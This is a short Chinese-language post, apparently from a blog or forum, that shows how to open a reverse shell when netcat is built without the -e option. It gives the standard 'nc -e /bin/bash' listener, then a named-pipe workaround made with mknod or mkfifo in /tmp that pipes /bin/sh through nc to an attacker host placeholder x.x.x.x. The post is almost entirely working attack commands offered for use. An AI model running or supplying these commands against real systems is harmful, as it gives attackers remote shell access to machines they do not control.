Unix系統(tǒng)自帶NC,但是為了安全,一般不會(huì)編譯-e選項(xiàng),也就無(wú)法反彈shell。但是可以變換一下思路,不直接使用NC反彈shell,而是反彈一個(gè)擁有shell權(quán)限的管道。
NC的原生做法:
nc -l -vv -p 2222 -e /bin/bash
無(wú)法使用NC反彈的時(shí)候可以這樣
先在tmp創(chuàng)建一個(gè)普通管道
mknod /tmp/backpipe p
或者
mkfifo /tmp/backpipe p
然后管道一邊接入shell,一變用NC反彈到攻擊者主機(jī)x.x.x.x
/bin/sh 0</tmp/backpipe | nc x.x.x.x listenport 1>/tmp/backpipe
PS:攻防的對(duì)抗一直在思路的轉(zhuǎn)變之間,將原有思路逆轉(zhuǎn),可能收獲不一樣的東西!